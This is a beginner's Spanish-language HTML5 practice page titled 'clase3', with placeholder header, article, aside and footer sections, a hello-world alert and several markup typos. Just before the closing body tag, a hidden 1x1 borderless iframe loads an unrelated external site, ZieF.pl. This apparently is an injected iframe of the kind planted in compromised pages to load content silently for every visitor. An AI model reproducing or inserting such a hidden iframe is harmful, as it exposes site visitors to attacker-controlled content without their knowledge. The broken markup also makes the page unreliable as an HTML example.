<!DOCTYPE html>
<html lang="es"> <!--comentario en html-->
<head>
	<meta charset="utf-8"/>
	<title> clase3</title>

	<link rel="stylsheet" href="estilo.css"/>
	<link rel="shortcut icon" href="/favicon.ico"/>
	<link rel="alternate" title ="Pozoleria RSS" type="aplication/rss+xml" href="feed.rss" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/chrome-frame/1/CFInstall.min.js"> </script>

<script type> ="tex/javascript">
window.alert("hola mundo");
</script>



</head>

<body> <header>
<h1> mi sitio web </h1>
<h1> clase3 </h1>
<p>Aplicado ccs a Mi sitio web creado en html5 </p>
</header>
<section>
<article>
<h2>titulo contenido</h2>
   <p>contentenido e imagnes </p>
   </article>
   </section>
   <aside>
    <h3>titulo contenido</h3>
    <p>contentenido </p>
</aside>
<footer>
creado por mi
</footer>
<iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
</body>
</html>
